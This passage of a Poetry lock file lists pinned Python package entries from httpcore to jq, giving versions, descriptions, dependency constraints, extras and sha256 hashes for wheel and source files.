"sha256:c7c629882da0cf377d66f073329ccf34a12ed2adf0169b9285ae4e63ef54c82b"}, {file = "html2text-2020.1.16.tar.gz", hash = "sha256:e296318e16b059ddb97f7a8a1d6a5c1d7af4544049a01e261731d2d5cc277bbb"}, ] [[package]] name = "httpcore" version = "0.18.0" description = "A minimal low-level HTTP client." 
optional = false python-versions = ">=3.8" files = [ {file = "httpcore-0.18.0-py3-none-any.whl", hash = "sha256:adc5398ee0a476567bf87467063ee63584a8bce86078bf748e48754f60202ced"}, {file = "httpcore-0.18.0.tar.gz", hash = "sha256:13b5e5cd1dca1a6636a6aaea212b19f4f85cd88c366a2b82304181b769aab3c9"}, ] [package.dependencies] anyio = ">=3.0,<5.0" certifi = "*" h11 = ">=0.13,<0.15" sniffio = "==1.*" [package.extras] http2 = ["h2 (>=3,<5)"] socks = ["socksio (==1.*)"] [[package]] name = "httplib2" version = "0.22.0" description = "A comprehensive HTTP client library." optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*" files = [ {file = "httplib2-0.22.0-py3-none-any.whl", hash = "sha256:14ae0a53c1ba8f3d37e9e27cf37eabb0fb9980f435ba405d546948b009dd64dc"}, {file = "httplib2-0.22.0.tar.gz", hash = "sha256:d7a10bc5ef5ab08322488bde8c726eeee5c8618723fdb399597ec58f3d82df81"}, ] [package.dependencies] pyparsing = {version = ">=2.4.2,<3.0.0 || >3.0.0,<3.0.1 || >3.0.1,<3.0.2 || >3.0.2,<3.0.3 || >3.0.3,<4", markers = "python_version > \"3.0\""} [[package]] name = "httpx" version = "0.25.0" description = "The next generation HTTP client." optional = false python-versions = ">=3.8" files = [ {file = "httpx-0.25.0-py3-none-any.whl", hash = "sha256:181ea7f8ba3a82578be86ef4171554dd45fec26a02556a744db029a0a27b7100"}, {file = "httpx-0.25.0.tar.gz", hash = "sha256:47ecda285389cb32bb2691cc6e069e3ab0205956f681c5b2ad2325719751d875"}, ] [package.dependencies] brotli = {version = "*", optional = true, markers = "platform_python_implementation == \"CPython\" and extra == \"brotli\""} brotlicffi = {version = "*", optional = true, markers = "platform_python_implementation != \"CPython\" and extra == \"brotli\""} certifi = "*" h2 = {version = ">=3,<5", optional = true, markers = "extra == \"http2\""} httpcore = ">=0.18.0,<0.19.0" idna = "*" sniffio = "*" socksio = {version = "==1.*", optional = true, markers = "extra == \"socks\""} [package.extras] brotli = ["brotli", "brotlicffi"] cli = ["click (==8.*)", "pygments (==2.*)", "rich (>=10,<14)"] http2 = ["h2 (>=3,<5)"] socks = ["socksio (==1.*)"] [[package]] name = "huggingface-hub" version = "0.18.0" description = "Client library to download and publish models, datasets and other repos on the huggingface.co hub" optional = true python-versions = ">=3.8.0" files = [ {file = "huggingface_hub-0.18.0-py3-none-any.whl", hash = "sha256:ee0b6b68acbf6aeb6d083ea081e981c277a1104b82ab67fdf6780ff5396830af"}, {file = "huggingface_hub-0.18.0.tar.gz", hash = "sha256:10eda12b9c1cfa800b4b7c096b3ace8843734c3f28d69d1c243743fb7d7a2e81"}, ] [package.dependencies] filelock = "*" fsspec = ">=2023.5.0" packaging = ">=20.9" pyyaml = ">=5.1" requests = "*" tqdm = ">=4.42.1" typing-extensions = ">=3.7.4.3" [package.extras] all = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "black (==23.7)", "gradio", "jedi", "mypy (==1.5.1)", "numpy", "pydantic (<2.0)", "pytest", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-vcr", "pytest-xdist", "ruff (>=0.0.241)", "soundfile", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3", "urllib3 (<2.0)"] cli = ["InquirerPy (==0.3.4)"] dev = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "black (==23.7)", "gradio", "jedi", "mypy (==1.5.1)", "numpy", "pydantic (<2.0)", "pytest", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-vcr", "pytest-xdist", "ruff (>=0.0.241)", "soundfile", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", 
"types-urllib3", "urllib3 (<2.0)"] docs = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "black (==23.7)", "gradio", "hf-doc-builder", "jedi", "mypy (==1.5.1)", "numpy", "pydantic (<2.0)", "pytest", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-vcr", "pytest-xdist", "ruff (>=0.0.241)", "soundfile", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3", "urllib3 (<2.0)", "watchdog"] fastai = ["fastai (>=2.4)", "fastcore (>=1.3.27)", "toml"] inference = ["aiohttp", "pydantic (<2.0)"] quality = ["black (==23.7)", "mypy (==1.5.1)", "ruff (>=0.0.241)"] tensorflow = ["graphviz", "pydot", "tensorflow"] testing = ["InquirerPy (==0.3.4)", "Jinja2", "Pillow", "aiohttp", "gradio", "jedi", "numpy", "pydantic (<2.0)", "pytest", "pytest-asyncio", "pytest-cov", "pytest-env", "pytest-vcr", "pytest-xdist", "soundfile", "urllib3 (<2.0)"] torch = ["torch"] typing = ["pydantic (<2.0)", "types-PyYAML", "types-requests", "types-simplejson", "types-toml", "types-tqdm", "types-urllib3"] [[package]] name = "humanfriendly" version = "10.0" description = "Human friendly output for text interfaces using Python" optional = true python-versions = ">=2.7, !=3.0.*, !=3.1.*, !=3.2.*, !=3.3.*, !=3.4.*" files = [ {file = "humanfriendly-10.0-py2.py3-none-any.whl", hash = "sha256:1697e1a8a8f550fd43c2865cd84542fc175a61dcb779b6fee18cf6b6ccba1477"}, {file = "humanfriendly-10.0.tar.gz", hash = "sha256:6b0b831ce8f15f7300721aa49829fc4e83921a9a301cc7f606be6686a2288ddc"}, ] [package.dependencies] pyreadline3 = {version = "*", markers = "sys_platform == \"win32\" and python_version >= \"3.8\""} [[package]] name = "humbug" version = "0.3.2" description = "Humbug: Do you build developer tools? Humbug helps you know your users." optional = true python-versions = "*" files = [ {file = "humbug-0.3.2-py3-none-any.whl", hash = "sha256:0d302c82019842f4267ed05b54a26b155ab8dc441ac129e2a62c9c4892d53c71"}, {file = "humbug-0.3.2.tar.gz", hash = "sha256:0fca3cdb6db2348e13d7835b1a743ff545e38344fc55ad4e2a083634b12a0a6e"}, ] [package.dependencies] requests = "*" [package.extras] dev = ["black", "mypy", "types-dataclasses", "types-pkg-resources", "types-psutil", "types-requests", "wheel"] distribute = ["setuptools", "twine", "wheel"] profile = ["GPUtil", "psutil", "types-psutil"] [[package]] name = "hyperframe" version = "6.0.1" description = "HTTP/2 framing layer for Python" optional = true python-versions = ">=3.6.1" files = [ {file = "hyperframe-6.0.1-py3-none-any.whl", hash = "sha256:0ec6bafd80d8ad2195c4f03aacba3a8265e57bc4cff261e802bf39970ed02a15"}, {file = "hyperframe-6.0.1.tar.gz", hash = "sha256:ae510046231dc8e9ecb1a6586f63d2347bf4c8905914aa84ba585ae85f28a914"}, ] [[package]] name = "idna" version = "3.4" description = "Internationalized Domain Names in Applications (IDNA)" optional = false python-versions = ">=3.5" files = [ {file = "idna-3.4-py3-none-any.whl", hash = "sha256:90b77e79eaa3eba6de819a0c442c0b4ceefc341a7a2ab77d7562bf49f425c5c2"}, {file = "idna-3.4.tar.gz", hash = "sha256:814f528e8dead7d329833b91c5faa87d60bf71824cd12a7530b5526063d02cb4"}, ] [[package]] name = "importlib-metadata" version = "6.8.0" description = "Read metadata from Python packages" optional = false python-versions = ">=3.8" files = [ {file = "importlib_metadata-6.8.0-py3-none-any.whl", hash = "sha256:3ebb78df84a805d7698245025b975d9d67053cd94c79245ba4b3eb694abe68bb"}, {file = "importlib_metadata-6.8.0.tar.gz", hash = "sha256:dbace7892d8c0c4ac1ad096662232f831d4e64f4c4545bd53016a3e9d4654743"}, ] 
[package.dependencies] zipp = ">=0.5" [package.extras] docs = ["furo", "jaraco.packaging (>=9)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-lint"] perf = ["ipython"] testing = ["flufl.flake8", "importlib-resources (>=1.3)", "packaging", "pyfakefs", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=2.2)", "pytest-mypy (>=0.9.1)", "pytest-perf (>=0.9.2)", "pytest-ruff"] [[package]] name = "importlib-resources" version = "6.1.0" description = "Read resources from Python packages" optional = false python-versions = ">=3.8" files = [ {file = "importlib_resources-6.1.0-py3-none-any.whl", hash = "sha256:aa50258bbfa56d4e33fbd8aa3ef48ded10d1735f11532b8df95388cc6bdb7e83"}, {file = "importlib_resources-6.1.0.tar.gz", hash = "sha256:9d48dcccc213325e810fd723e7fbb45ccb39f6cf5c31f00cf2b965f5f10f3cb9"}, ] [package.dependencies] zipp = {version = ">=3.1.0", markers = "python_version < \"3.10\""} [package.extras] docs = ["furo", "jaraco.packaging (>=9.3)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (<7.2.5)", "sphinx (>=3.5)", "sphinx-lint"] testing = ["pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=2.2)", "pytest-mypy (>=0.9.1)", "pytest-ruff", "zipp (>=3.17)"] [[package]] name = "iniconfig" version = "2.0.0" description = "brain-dead simple config-ini parsing" optional = false python-versions = ">=3.7" files = [ {file = "iniconfig-2.0.0-py3-none-any.whl", hash = "sha256:b6a85871a79d2e3b22d2d1b94ac2824226a63c6b741c88f7ae975f18b6778374"}, {file = "iniconfig-2.0.0.tar.gz", hash = "sha256:2d91e135bf72d31a410b17c16da610a82cb55f6b0477d1a902134b24a455b8b3"}, ] [[package]] name = "ipykernel" version = "6.26.0" description = "IPython Kernel for Jupyter" optional = false python-versions = ">=3.8" files = [ {file = "ipykernel-6.26.0-py3-none-any.whl", hash = "sha256:3ba3dc97424b87b31bb46586b5167b3161b32d7820b9201a9e698c71e271602c"}, {file = "ipykernel-6.26.0.tar.gz", hash = "sha256:553856658eb8430bbe9653ea041a41bff63e9606fc4628873fc92a6cf3abd404"}, ] [package.dependencies] appnope = {version = "*", markers = "platform_system == \"Darwin\""} comm = ">=0.1.1" debugpy = ">=1.6.5" ipython = ">=7.23.1" jupyter-client = ">=6.1.12" jupyter-core = ">=4.12,<5.0.dev0 || >=5.1.dev0" matplotlib-inline = ">=0.1" nest-asyncio = "*" packaging = "*" psutil = "*" pyzmq = ">=20" tornado = ">=6.1" traitlets = ">=5.4.0" [package.extras] cov = ["coverage[toml]", "curio", "matplotlib", "pytest-cov", "trio"] docs = ["myst-parser", "pydata-sphinx-theme", "sphinx", "sphinx-autodoc-typehints", "sphinxcontrib-github-alt", "sphinxcontrib-spelling", "trio"] pyqt5 = ["pyqt5"] pyside6 = ["pyside6"] test = ["flaky", "ipyparallel", "pre-commit", "pytest (>=7.0)", "pytest-asyncio", "pytest-cov", "pytest-timeout"] [[package]] name = "ipython" version = "8.12.3" description = "IPython: Productive Interactive Computing" optional = false python-versions = ">=3.8" files = [ {file = "ipython-8.12.3-py3-none-any.whl", hash = "sha256:b0340d46a933d27c657b211a329d0be23793c36595acf9e6ef4164bc01a1804c"}, {file = "ipython-8.12.3.tar.gz", hash = "sha256:3910c4b54543c2ad73d06579aa771041b7d5707b033bd488669b4cf544e3b363"}, ] [package.dependencies] appnope = {version = "*", markers = "sys_platform == \"darwin\""} backcall = "*" colorama = {version = "*", markers = "sys_platform == \"win32\""} decorator = "*" jedi = ">=0.16" matplotlib-inline = "*" pexpect = {version = ">4.3", markers = "sys_platform != \"win32\""} 
pickleshare = "*" prompt-toolkit = ">=3.0.30,<3.0.37 || >3.0.37,<3.1.0" pygments = ">=2.4.0" stack-data = "*" traitlets = ">=5" typing-extensions = {version = "*", markers = "python_version < \"3.10\""} [package.extras] all = ["black", "curio", "docrepr", "ipykernel", "ipyparallel", "ipywidgets", "matplotlib", "matplotlib (!=3.2.0)", "nbconvert", "nbformat", "notebook", "numpy (>=1.21)", "pandas", "pytest (<7)", "pytest (<7.1)", "pytest-asyncio", "qtconsole", "setuptools (>=18.5)", "sphinx (>=1.3)", "sphinx-rtd-theme", "stack-data", "testpath", "trio", "typing-extensions"] black = ["black"] doc = ["docrepr", "ipykernel", "matplotlib", "pytest (<7)", "pytest (<7.1)", "pytest-asyncio", "setuptools (>=18.5)", "sphinx (>=1.3)", "sphinx-rtd-theme", "stack-data", "testpath", "typing-extensions"] kernel = ["ipykernel"] nbconvert = ["nbconvert"] nbformat = ["nbformat"] notebook = ["ipywidgets", "notebook"] parallel = ["ipyparallel"] qtconsole = ["qtconsole"] test = ["pytest (<7.1)", "pytest-asyncio", "testpath"] test-extra = ["curio", "matplotlib (!=3.2.0)", "nbformat", "numpy (>=1.21)", "pandas", "pytest (<7.1)", "pytest-asyncio", "testpath", "trio"] [[package]] name = "ipython-genutils" version = "0.2.0" description = "Vestigial utilities from IPython" optional = false python-versions = "*" files = [ {file = "ipython_genutils-0.2.0-py2.py3-none-any.whl", hash = "sha256:72dd37233799e619666c9f639a9da83c34013a73e8bbc79a7a6348d93c61fab8"}, {file = "ipython_genutils-0.2.0.tar.gz", hash = "sha256:eb2e116e75ecef9d4d228fdc66af54269afa26ab4463042e33785b887c628ba8"}, ] [[package]] name = "ipywidgets" version = "8.1.1" description = "Jupyter interactive widgets" optional = false python-versions = ">=3.7" files = [ {file = "ipywidgets-8.1.1-py3-none-any.whl", hash = "sha256:2b88d728656aea3bbfd05d32c747cfd0078f9d7e159cf982433b58ad717eed7f"}, {file = "ipywidgets-8.1.1.tar.gz", hash = "sha256:40211efb556adec6fa450ccc2a77d59ca44a060f4f9f136833df59c9f538e6e8"}, ] [package.dependencies] comm = ">=0.1.3" ipython = ">=6.1.0" jupyterlab-widgets = ">=3.0.9,<3.1.0" traitlets = ">=4.3.1" widgetsnbextension = ">=4.0.9,<4.1.0" [package.extras] test = ["ipykernel", "jsonschema", "pytest (>=3.6.0)", "pytest-cov", "pytz"] [[package]] name = "isodate" version = "0.6.1" description = "An ISO 8601 date/time/duration parser and formatter" optional = true python-versions = "*" files = [ {file = "isodate-0.6.1-py2.py3-none-any.whl", hash = "sha256:0751eece944162659049d35f4f549ed815792b38793f07cf73381c1c87cbed96"}, {file = "isodate-0.6.1.tar.gz", hash = "sha256:48c5881de7e8b0a0d648cb024c8062dc84e7b840ed81e864c7614fd3c127bde9"}, ] [package.dependencies] six = "*" [[package]] name = "isoduration" version = "20.11.0" description = "Operations with ISO 8601 durations" optional = false python-versions = ">=3.7" files = [ {file = "isoduration-20.11.0-py3-none-any.whl", hash = "sha256:b2904c2a4228c3d44f409c8ae8e2370eb21a26f7ac2ec5446df141dde3452042"}, {file = "isoduration-20.11.0.tar.gz", hash = "sha256:ac2f9015137935279eac671f94f89eb00584f940f5dc49462a0c4ee692ba1bd9"}, ] [package.dependencies] arrow = ">=0.15.0" [[package]] name = "jaraco-context" version = "4.3.0" description = "Context managers by jaraco" optional = true python-versions = ">=3.7" files = [ {file = "jaraco.context-4.3.0-py3-none-any.whl", hash = "sha256:5d9e95ca0faa78943ed66f6bc658dd637430f16125d86988e77844c741ff2f11"}, {file = "jaraco.context-4.3.0.tar.gz", hash = "sha256:4dad2404540b936a20acedec53355bdaea223acb88fd329fa6de9261c941566e"}, ] [package.extras] docs = 
["furo", "jaraco.packaging (>=9)", "jaraco.tidelift (>=1.4)", "rst.linker (>=1.9)", "sphinx (>=3.5)", "sphinx-lint"] testing = ["flake8 (<5)", "pytest (>=6)", "pytest-black (>=0.3.7)", "pytest-checkdocs (>=2.4)", "pytest-cov", "pytest-enabler (>=1.3)", "pytest-flake8", "pytest-mypy (>=0.9.1)"] [[package]] name = "jedi" version = "0.19.1" description = "An autocompletion tool for Python that can be used for text editors." optional = false python-versions = ">=3.6" files = [ {file = "jedi-0.19.1-py2.py3-none-any.whl", hash = "sha256:e983c654fe5c02867aef4cdfce5a2fbb4a50adc0af145f70504238f18ef5e7e0"}, {file = "jedi-0.19.1.tar.gz", hash = "sha256:cf0496f3651bc65d7174ac1b7d043eff454892c708a87d1b683e57b569927ffd"}, ] [package.dependencies] parso = ">=0.8.3,<0.9.0" [package.extras] docs = ["Jinja2 (==2.11.3)", "MarkupSafe (==1.1.1)", "Pygments (==2.8.1)", "alabaster (==0.7.12)", "babel (==2.9.1)", "chardet (==4.0.0)", "commonmark (==0.8.1)", "docutils (==0.17.1)", "future (==0.18.2)", "idna (==2.10)", "imagesize (==1.2.0)", "mock (==1.0.1)", "packaging (==20.9)", "pyparsing (==2.4.7)", "pytz (==2021.1)", "readthedocs-sphinx-ext (==2.1.4)", "recommonmark (==0.5.0)", "requests (==2.25.1)", "six (==1.15.0)", "snowballstemmer (==2.1.0)", "sphinx (==1.8.5)", "sphinx-rtd-theme (==0.4.3)", "sphinxcontrib-serializinghtml (==1.1.4)", "sphinxcontrib-websupport (==1.2.4)", "urllib3 (==1.26.4)"] qa = ["flake8 (==5.0.4)", "mypy (==0.971)", "types-setuptools (==67.2.0.1)"] testing = ["Django", "attrs", "colorama", "docopt", "pytest (<7.0.0)"] [[package]] name = "jieba3k" version = "0.35.1" description = "Chinese Words Segementation Utilities" optional = true python-versions = "*" files = [ {file = "jieba3k-0.35.1.zip", hash = "sha256:980a4f2636b778d312518066be90c7697d410dd5a472385f5afced71a2db1c10"}, ] [[package]] name = "jinja2" version = "3.1.2" description = "A very fast and expressive template engine." optional = false python-versions = ">=3.7" files = [ {file = "Jinja2-3.1.2-py3-none-any.whl", hash = "sha256:6088930bfe239f0e6710546ab9c19c9ef35e29792895fed6e6e31a023a182a61"}, {file = "Jinja2-3.1.2.tar.gz", hash = "sha256:31351a702a408a9e7595a8fc6150fc3f43bb6bf7e319770cbc0db9df9437e852"}, ] [package.dependencies] MarkupSafe = ">=2.0" [package.extras] i18n = ["Babel (>=2.7)"] [[package]] name = "jmespath" version = "1.0.1" description = "JSON Matching Expressions" optional = true python-versions = ">=3.7" files = [ {file = "jmespath-1.0.1-py3-none-any.whl", hash = "sha256:02e2e4cc71b5bcab88332eebf907519190dd9e6e82107fa7f83b1003a6252980"}, {file = "jmespath-1.0.1.tar.gz", hash = "sha256:90261b206d6defd58fdd5e85f478bf633a2901798906be2ad389150c5c60edbe"}, ] [[package]] name = "joblib" version = "1.3.2" description = "Lightweight pipelining with Python functions" optional = true python-versions = ">=3.7" files = [ {file = "joblib-1.3.2-py3-none-any.whl", hash = "sha256:ef4331c65f239985f3f2220ecc87db222f08fd22097a3dd5698f693875f8cbb9"}, {file = "joblib-1.3.2.tar.gz", hash = "sha256:92f865e621e17784e7955080b6d042489e3b8e294949cc44c6eac304f59772b1"}, ] [[package]] name = "jq" version = "1.6.0" description = "jq is a lightweight and flexible JSON processor." 
optional = true python-versions = ">=3.5" files = [ {file = "jq-1.6.0-cp310-cp310-macosx_10_9_x86_64.whl", hash = "sha256:5773851cfb9ec6525f362f5bf7f18adab5c1fd1f0161c3599264cd0118c799da"}, {file = "jq-1.6.0-cp310-cp310-macosx_11_0_arm64.whl", hash = "sha256:a758df4eae767a21ebd8466dfd0066d99c9741d9f7fd4a7e1d5b5227e1924af7"}, {file = "jq-1.6.0-cp310-cp310-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:15cf9dd3e7fb40d029f12f60cf418374c0b830a6ea6267dd285b48809069d6af"}, {file = "jq-1.6.0-cp310-cp310-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:c7e768cf5c25d703d944ef81c787d745da0eb266a97768f3003f91c4c828118d"}, {file = "jq-1.6.0-cp310-cp310-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:85a697b3cdc65e787f90faa1237caa44c117b6b2853f21263c3f0b16661b192c"}, {file = "jq-1.6.0-cp310-cp310-musllinux_1_1_aarch64.whl", hash = "sha256:944e081c328501ddc0a22a8f08196df72afe7910ca11e1a1f21244410dbdd3b3"}, {file = "jq-1.6.0-cp310-cp310-musllinux_1_1_i686.whl", hash = "sha256:09262d0e0cafb03acc968622e6450bb08abfb14c793bab47afd2732b47c655fd"}, {file = "jq-1.6.0-cp310-cp310-musllinux_1_1_x86_64.whl", hash = "sha256:611f460f616f957d57e0da52ac6e1e6294b073c72a89651da5546a31347817bd"}, {file = "jq-1.6.0-cp311-cp311-macosx_10_9_x86_64.whl", hash = "sha256:aba35b5cc07cd75202148e55f47ede3f4d0819b51c80f6d0c82a2ca47db07189"}, {file = "jq-1.6.0-cp311-cp311-macosx_11_0_arm64.whl", hash = "sha256:ef5ddb76b03610df19a53583348aed3604f21d0ba6b583ee8d079e8df026cd47"}, {file = "jq-1.6.0-cp311-cp311-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:872f322ff7bfd7daff41b7e8248d414a88722df0e82d1027f3b091a438543e63"}, {file = "jq-1.6.0-cp311-cp311-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:ca7a2982ff26f4620ac03099542a0230dabd8787af3f03ac93660598e26acbf0"}, {file = "jq-1.6.0-cp311-cp311-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:316affc6debf15eb05b7fd8e84ebf8993042b10b840e8d2a504659fb3ba07992"}, {file = "jq-1.6.0-cp311-cp311-musllinux_1_1_aarch64.whl", hash = "sha256:9bc42ade4de77fe4370c0e8e105ef10ad1821ef74d61dcc70982178b9ecfdc72"}, {file = "jq-1.6.0-cp311-cp311-musllinux_1_1_i686.whl", hash = "sha256:02da59230912b886ed45489f3693ce75877f3e99c9e490c0a2dbcf0db397e0df"}, {file = "jq-1.6.0-cp311-cp311-musllinux_1_1_x86_64.whl", hash = "sha256:7ea39f89aa469eb12145ddd686248916cd6d186647aa40b319af8444b1f45a2d"}, {file = "jq-1.6.0-cp312-cp312-macosx_10_9_x86_64.whl", hash = "sha256:6e9016f5ba064fabc527adb609ebae1f27cac20c8e0da990abae1cfb12eca706"}, {file = "jq-1.6.0-cp312-cp312-macosx_11_0_arm64.whl", hash = "sha256:022be104a548f7fbddf103ce749937956df9d37a4f2f1650396dacad73bce7ee"}, {file = "jq-1.6.0-cp312-cp312-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:1d5a7f31f779e1aa3d165eaec237d74c7f5728227e81023a576c939ba3da34f8"}, {file = "jq-1.6.0-cp312-cp312-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:5f1533a2a15c42be3368878b4031b12f30441246878e0b5f6bedfdd7828cdb1f"}, {file = "jq-1.6.0-cp312-cp312-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8aa67a304e58aa85c550ec011a68754ae49abe227b37d63a351feef4eea4c7a7"}, {file = "jq-1.6.0-cp312-cp312-musllinux_1_1_aarch64.whl", hash = "sha256:0893d1590cfa6facaf787cc6c28ac51e47d0d06a303613f84d4943ac0ca98e32"}, {file = "jq-1.6.0-cp312-cp312-musllinux_1_1_i686.whl", hash = "sha256:63db80b4803905a4f4f6c87a17aa1816c530f6262bc795773ebe60f8ab259092"}, 
{file = "jq-1.6.0-cp312-cp312-musllinux_1_1_x86_64.whl", hash = "sha256:e2c1f429e644cb962e846a6157b5352c3c556fbd0b22bba9fc2fea0710333369"}, {file = "jq-1.6.0-cp36-cp36m-macosx_10_9_x86_64.whl", hash = "sha256:bcf574f28809ec63b8df6456fdd4a981751b7466851e80621993b4e9d3e3c8ee"}, {file = "jq-1.6.0-cp36-cp36m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:49dbe0f003b411ca52b5d0afaf09cad8e430a1011181c86f2ef720a0956f31c1"}, {file = "jq-1.6.0-cp36-cp36m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:9f5a9c4185269a5faf395aa7ca086c7b02c9c8b448d542be3b899041d06e0970"}, {file = "jq-1.6.0-cp36-cp36m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:8265f3badcd125f234e55dfc02a078c5decdc6faafcd453fde04d4c0d2699886"}, {file = "jq-1.6.0-cp36-cp36m-musllinux_1_1_aarch64.whl", hash = "sha256:c6c39b53d000d2f7f9f6338061942b83c9034d04f3bc99acae0867d23c9e7127"}, {file = "jq-1.6.0-cp36-cp36m-musllinux_1_1_i686.whl", hash = "sha256:9897931ea7b9a46f8165ee69737ece4a2e6dbc8e10ececb81f459d51d71401df"}, {file = "jq-1.6.0-cp36-cp36m-musllinux_1_1_x86_64.whl", hash = "sha256:6312237159e88e92775ea497e0c739590528062d4074544aacf12a08d252f966"}, {file = "jq-1.6.0-cp37-cp37m-macosx_10_9_x86_64.whl", hash = "sha256:aa786a60bdd1a3571f092a4021dd9abf6c46798530fa99f19ecf4f0fceaa7eaf"}, {file = "jq-1.6.0-cp37-cp37m-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:22495573d8221320d3433e1aeded40132bd8e1726845629558bd73aaa66eef7b"}, {file = "jq-1.6.0-cp37-cp37m-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:711eabc5d33ef3ec581e0744d9cff52f43896d84847a2692c287a0140a29c915"}, {file = "jq-1.6.0-cp37-cp37m-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:57e75c1563d083b0424690b3c3ef2bb519e670770931fe633101ede16615d6ee"}, {file = "jq-1.6.0-cp37-cp37m-musllinux_1_1_aarch64.whl", hash = "sha256:c795f175b1a13bd716a0c180d062cc8e305271f47bbdb9eb0f0f62f7e4f5def4"}, {file = "jq-1.6.0-cp37-cp37m-musllinux_1_1_i686.whl", hash = "sha256:227b178b22a7f91ae88525810441791b1ca1fc71c86f03190911793be15cec3d"}, {file = "jq-1.6.0-cp37-cp37m-musllinux_1_1_x86_64.whl", hash = "sha256:780eb6383fbae12afa819ef676fc93e1548ae4b076c004a393af26a04b460742"}, {file = "jq-1.6.0-cp38-cp38-macosx_10_9_x86_64.whl", hash = "sha256:08ded6467f4ef89fec35b2bf310f210f8cd13fbd9d80e521500889edf8d22441"}, {file = "jq-1.6.0-cp38-cp38-macosx_11_0_arm64.whl", hash = "sha256:49e44ed677713f4115bd5bf2dbae23baa4cd503be350e12a1c1f506b0687848f"}, {file = "jq-1.6.0-cp38-cp38-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:984f33862af285ad3e41e23179ac4795f1701822473e1a26bf87ff023e5a89ea"}, {file = "jq-1.6.0-cp38-cp38-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:f42264fafc6166efb5611b5d4cb01058887d050a6c19334f6a3f8a13bb369df5"}, {file = "jq-1.6.0-cp38-cp38-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:a67154f150aaf76cc1294032ed588436eb002097dd4fd1e283824bf753a05080"}, {file = "jq-1.6.0-cp38-cp38-musllinux_1_1_aarch64.whl", hash = "sha256:1b3b95d5fd20e51f18a42647fdb52e5d8aaf150b7a666dd659cf282a2221ee3f"}, {file = "jq-1.6.0-cp38-cp38-musllinux_1_1_i686.whl", hash = "sha256:3a8d98f72111043e75610cad7fa9ec5aec0b1ee2f7332dc7fd0f6603ea8144f8"}, {file = "jq-1.6.0-cp38-cp38-musllinux_1_1_x86_64.whl", hash = "sha256:487483f10ae8f70e6acf7723f31b329736de4b421ce56b2f43b46d5cbd7337b0"}, {file = "jq-1.6.0-cp39-cp39-macosx_10_9_x86_64.whl", hash = 
"sha256:18a700f55b7ef83a1382edf0a48cb176b22bacd155e097375ef2345ff8621d97"}, {file = "jq-1.6.0-cp39-cp39-macosx_11_0_arm64.whl", hash = "sha256:68aec8534ac3c4705e524b4ef54f66b8bdc867df9e0af2c3895e82c6774b5374"}, {file = "jq-1.6.0-cp39-cp39-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = "sha256:b7a164748dbd03bb06d23bab7ead7ba7e5c4fcfebea7b082bdcd21d14136931e"}, {file = "jq-1.6.0-cp39-cp39-manylinux_2_17_x86_64.manylinux2014_x86_64.whl", hash = "sha256:aa22d24740276a8ce82411e4960ed2b5fab476230f913f9d9cf726f766a22208"}, {file = "jq-1.6.0-cp39-cp39-manylinux_2_5_i686.manylinux1_i686.manylinux_2_17_i686.manylinux2014_i686.whl", hash = "sha256:4c1a6fae1b74b3e0478e281eb6addedad7b32421221ac685e21c1d49af5e997f"}, {file = "jq-1.6.0-cp39-cp39-musllinux_1_1_aarch64.whl", hash = "sha256:ce628546c22792b8870b9815086f65873ebb78d7bf617b5a16dd839adba36538"}, {file = "jq-1.6.0-cp39-cp39-musllinux_1_1_i686.whl", hash = "sha256:7bb685f337cf5d4f4fe210c46220e31a7baec02a0ca0df3ace3dd4780328fc30"}, {file = "jq-1.6.0-cp39-cp39-musllinux_1_1_x86_64.whl", hash = "sha256:bdbbc509a35ee6082d79c1f25eb97c08f1c59043d21e0772cd24baa909505899"}, {file = "jq-1.6.0-pp310-pypy310_pp73-macosx_10_9_x86_64.whl", hash = "sha256:1b332dfdf0d81fb7faf3d12aabf997565d7544bec9812e0ac5ee55e60ef4df8c"}, {file = "jq-1.6.0-pp310-pypy310_pp73-macosx_11_0_arm64.whl", hash = "sha256:3a4f6ef8c0bd19beae56074c50026665d66345d1908f050e5c442ceac2efe398"}, {file = "jq-1.6.0-pp310-pypy310_pp73-manylinux_2_17_aarch64.manylinux2014_aarch64.whl", hash = 